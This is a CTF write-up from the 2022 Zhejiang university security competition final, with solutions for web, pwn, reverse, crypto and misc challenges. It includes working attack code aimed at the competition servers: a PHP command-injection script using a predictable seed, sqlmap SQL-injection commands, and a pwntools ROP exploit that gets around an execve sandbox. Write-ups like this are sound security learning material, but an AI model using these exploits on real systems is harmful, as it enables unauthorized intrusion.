第五届浙江省大学生网络与信息安全竞赛技能挑战赛(决赛)

date
Sep 24, 2022
slug
nisc2022-finals
status
Published
tags
CTF
WriteUP
summary
type
Post
  • 名称:签个到我就跑Ⅱ
  • 排名:2

Web

ezphp

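<?php
    // One request per candidate seed (time()+1 .. time()+4) so that a small
    // clock skew between this host and the server is covered. The server
    // presumably rebuilds the same shuffled array from mt_srand(time()) and
    // expects the positions of "system" and $cmd back as b and c; seeding a
    // PRNG from the wall clock is exactly what makes the shuffle reproducible.
    $cmd="cat%20/flag";
    for ($offset=1;$offset<=4;$offset++){
        mt_srand(time()+$offset);
        $a=array("system",$cmd);
        for ($i=0;$i<=10000;$i++){
            array_push($a,"Ctfer");
        }
        shuffle($a);
        // positions of the two markers after the seeded shuffle
        $b=array_search("system",$a);
        $c=array_search($cmd,$a);
        echo $a[$b];//system
        echo $a[$c];//cat%20/flag
        $curl=curl_init();
        curl_setopt($curl,CURLOPT_URL,'http://1.14.97.218:23043/index.php?cmd='.$cmd."&b=".$b."&c=".$c);
        curl_setopt($curl,CURLOPT_HEADER,1);
        curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
        $data=curl_exec($curl);
        curl_close($curl);
        print_r($data);
    }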
本地部署发包

babysql

sqlmap直接爆
sqlmap -u http://1.14.97.218:20461/search.php?id=1 -tamper="space2comment.py"
sqlmap -u http://1.14.97.218:20461/search.php?id=1 -tamper="space2comment.py" -D ctf -tables
flag在ctf库中的email表中的email_id

PWN

GO-MAZE-v4

“童年回忆小迷宫,走完就送flag哦”——确实,漏洞点放在迷宫走完之后。通过cyclic生成1000字符丢进去,测到存在溢出,偏移0x180;尝试直接用system函数和/bin/sh发现段错误,然后查看发现存在沙箱禁用了execve:
 line  CODE  JT   JF      K

 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x02 0xc000003e  if (A != ARCH_X86_64) goto 0004
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x15 0x00 0x01 0x0000003b  if (A != execve) goto 0005
 0004: 0x06 0x00 0x00 0x00000000  return KILL
 0005: 0x06 0x00 0x00 0x7fff0000  return ALLOW
所以是个orw题目,通过ROP来构建ORW即可
notion image
EXP:
# coding=utf-8
from pwn import *
#p=process("./pwn")
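elf=ELF("./pwn")  # local copy of the challenge binary; only used to locate the "flag" string
p=remote("1.14.97.218","24102")
# one context setup is enough: the separate `context.log_level = 'debug'`
# assignment was redundant with the log_level passed here
context(arch='amd64',log_level='debug',os='linux') #x64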
def migong():
    """Walk the maze by replaying the fixed w/a/s/d key sequence, one key per line."""
    # the same 19 moves as before, read left to right
    route = "sssss" "dddd" "www" "ddd" "w" "d" "ww"
    for step in route:
        p.sendline(step)

migong()  # finish the maze first; the overflow is only reachable afterwards (see text above)

#gdb.attach(p)
#pause()
# ROP gadgets; addresses belong to this particular ./pwn build (fixed addresses, no PIE assumed - confirm)
pop_rsi=0x40416f
pop_rdx=0x51d4b6
pop_rax=0x400a4f
syscall=0x4025ab
pop_rdi=0x4008f6

pop_rbx=0x402498   # not used below
pop_dx_si=0x51d559  # sets rdx then rsi in one gadget (order assumed from how it is used below)

buf=0x98a000  # writable scratch area: the second stage is read to buf+0x300, the file contents to buf
leave=0x4015cb



#read write open

# write_plt=0x63A3AE
# open_plt=0x674487

# stage 1: read(0, buf+0x300, 0x100), then `leave` moves rsp onto the freshly read chain.
# rax is never set here, so this relies on it already being 0 (read) at the syscall - confirm.
fuck=b''
fuck+=p64(pop_rdi)+p64(0)
fuck+=p64(pop_dx_si)+p64(0x100)+p64(buf+0x300)
fuck+=p64(syscall)+p64(leave)
#fuck+=p64(pop_rdx)+p64(0x100)+p64(syscall)
p.recvuntil('flag')
# 0x178 bytes of filler, then the saved rbp (buf+0x300) that `leave` picks up, then the chain;
# 0x178 + 8 is the 0x180 offset measured with cyclic
p.sendline(b'a'*0x178+p64(buf+0x300)+fuck)
# payload="A"*384
# +p64(pop_rdi_ret)+p64(0x72cef8)+p64(0x64E059)
sleep(1)
# payload=388*"a"+"b"*8+p64(0x400A90)

# stage 2, lands at buf+0x300: the leading qword is what `leave`'s pop rbp consumes,
# the rest is the open / read / write sequence
payload=p64(0)+p64(pop_rax)+p64(2)#open
payload+=p64(pop_rdi)+p64(next(elf.search(b'flag')))  # pathname: first "flag" string found in the binary
payload+=p64(pop_rsi)+p64(0)  # flags 0 (read-only)
payload+=p64(syscall)

payload+=p64(pop_rax)+p64(0)  # read
payload+=p64(pop_rdi)+p64(3)  # fd 3: assumes the open above got the first free descriptor
payload+=p64(pop_rsi)+p64(buf)
payload+=p64(pop_rdx)+p64(0x100)
payload+=p64(syscall)

payload+=p64(pop_rax)+p64(1)  # write
payload+=p64(pop_rdi)+p64(1)  # to stdout
payload+=p64(pop_rsi)+p64(buf)
payload+=p64(pop_rdx)+p64(0x100)
payload+=p64(syscall)
p.sendline(payload)
p.interactive()

RE

EzMath2

upx殼,魔改區段
脫殼
dump
碼表映射
dfs
import string
import sys
sys.setrecursionlimit(10000)  # far more than needed: search() below steps idx by 2 up to 18, i.e. about ten levels deep

def sub_401120(a1):
    """Per-character transform, presumably lifted from the binary at 0x401120
    (the name is IDA-style): 57 * a1 modulo 127, masked to 7 bits."""
    scaled = a1 * 57
    return (scaled % 127) & 127

# code table: every printable character -> its transformed value, so the search can invert it
mmp = {ch: sub_401120(ord(ch)) for ch in string.printable}

print(mmp)

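# the 18-byte reference string to work back from (a second candidate is kept for reference);
# the dead `[0] * 18` placeholder that was immediately overwritten is gone
fake = bytearray(b'QQk/64WG6pq~aQt{pF')
# fake = bytearray(b'583~4q583+382q2d38')
BeingDebugged = 0  # presumably mirrors the binary's anti-debug flag; never read in this script

# even positions get (x + 1) ^ 7 applied before the search - presumably matching what the binary does to them
for i in range(0, 18, 2):
    fake[i] = ((fake[i] + 1) ^ 7)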

def search(flag: list, idx):
    """Depth-first recovery of the odd positions of `flag`.

    At each step every entry of the code table whose transformed value equals
    flag[idx + 1] is substituted in (as its ordinal) and the search continues
    two positions further. Every candidate visited is printed; nothing is returned.
    """
    print(flag)
    if idx >= 18:
        return
    target = flag[idx + 1]
    for ch, code in mmp.items():
        if code != target:
            continue
        candidate = flag.copy()
        candidate[idx + 1] = ord(ch)
        search(candidate, idx + 2)

ezandroid

壓縮包打開,搜索pic1.png,flag到手

Crypto

math

威爾遜定理+碼表映射
from gmpy2 import invert


def wilson(x,y):
    """Product of the integers y, y+1, ..., x-2, reduced modulo x after every
    multiplication (1 when y > x-2). Linear in x-y, so only usable for small x."""
    acc = 1
    for factor in range(y, x - 1):
        acc = (acc * factor) % x
    return acc


# 38-symbol alphabet of the substitution; the index arithmetic below reduces mod 37,
# so the last symbol '=' is never picked as a table key (compare the '=' -> 'a' replacement at the end)
strs = 'abcdefghijklmnopqrstuvwxyz0123456789+='

# the challenge modulus (presumably prime - the Wilson-theorem helper below assumes so)
n = 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333

def wilson(A,B):
    """Return B! mod A for prime A using Wilson's theorem (shadows the brute-force
    wilson(x, y) defined earlier in the file).

    (A-1)! = -1 (mod A), hence B! = -1 * (A-1)^-1 * ... * (B+1)^-1 (mod A); only
    A-B-1 modular inversions are needed, so it is cheap when B is close to A.
    With B == A-1 no inversion runs and A-1 (i.e. -1 mod A) is returned.
    """
    acc = -1
    for k in range(A - 1, B, -1):
        acc = (acc * invert(k, A)) % A
    return acc + A if acc < 0 else acc

# 176778040837484895481963794918312894811914463587783883976856801676290821243853364789418908640505211936881707629753845875997805883248035576046706978993073043757445726165605877196383212378074705385178610178824713153854530726380795438083708575716562524587045312909657881223522830729052758566504582290081411626333
# with B == n-1 the helper performs no inversion and simply yields n-1 (== -1 mod n)
key = wilson(n, n-1)

# inverse substitution table: (position * key + 7) mod 37 selects the ciphertext symbol
# standing for plaintext `ch`; a previous occupant of that slot (or None) is printed
mmp = {}
for pos, ch in enumerate(strs):
    k = (pos * key + 7) % 37
    print(mmp.get(strs[k]), (ch))
    mmp[strs[k]] = ch

c = 'u66hp7nuh01puoaip10pi6o0vzavnu11'
m = ''.join(mmp[sym] for sym in c)

print(m.replace('=', 'a'))

MISC

Unkn0wnData

末尾有base64
notion image
解密得到
Where1sKey?

🙃💵🌿🎤🚪🌏🐎🥋🚫😆✅🍍🎤🐘🌏ℹ⌨😍🎈✉🤣🛩🍌🚪🍴ℹ☺🚹❓🍴🔬🌪🍵👣🔄☃👌😎👌🔄👌🔪🍌👁🍍🍌🌏🎃🚰🍵🐍🎅✅🍍🦓😎😊🤣🏹🍍💧🔄🔄🤣👁🥋🚫☺🍴😁🚫😇🚰⏩😍🌿💵🦓😇🛩✖🕹🐎📂📂💧🗒🗒
emoji-aes
Stegsolve 拿到壓縮包
notion image
看到壓縮包頭,提取解壓得到鍵盤流量
寫個脚本,腦洞key
# hex keycode -> character for the unshifted layer (0x04 'a' ... 0x28 Enter, 0x2c space, as in the
# USB HID keyboard usage table). Both tables share the same key set; the lookup below indexes both.
normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
# same keycodes with Shift held
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
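output = []
# one keyboard report (as hex text) per line; read through a context manager so the
# handle is closed instead of staying open for the rest of the script
with open(r"D:\CTF\Reverse\zjctf2022\finals\key.txt") as fh:
    keys = fh.read().splitlines()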

# each line is assumed to be the hex dump of one keyboard report: line[1] is the modifier
# nibble (a '2' there is treated as Shift held) and line[4:6] the keycode byte - confirm against key.txt
for line in keys:
    table = shiftKeys if line[1] == '2' else normalKeys
    output.append(table[line[4:6]])

print(''.join(output))
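# The entries typed right before each <DEL> are what the author collects as the "real" key:
# repeatedly pull out the first <DEL> together with the entry in front of it (when <DEL> is
# first, a-1 is -1 and the last entry is taken - kept as in the original).
# ValueError means no <DEL> is left; IndexError can only happen once the list is empty.
# Both end the loop, replacing the bare `except: pass` that kept looping and hid errors.
realkey = []
for _ in range(len(output)):
    try:
        a = output.index('<DEL>')
        del output[a]
        realkey += output[a-1]   # right side is a str, so it is appended character by character
        del output[a-1]
    except (ValueError, IndexError):
        break

print(''.join(realkey))
print ('output :' + "".join(output))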

checkin_gift

notion image
发现一串base64编码,丢入magic自动解密
notion image

m4a

m4a文件写python脚本倒序
# the m4a is the byte-reversed archive: reverse it back and store it as aa.zip
with open("m4a", "rb") as reversed_src, open('aa.zip', 'wb') as archive:
    archive.write(reversed_src.read()[::-1])
倒序出zip之后用binwalk分离出一个zip
然后听m4a的摩斯电码得到密码
-.../.-/....-/...--/-.../-.-././..-./-.-./..---/-----/....-/
BA43BCEFC204
把txt中的内容用cyber的rot47+atbash解密
 
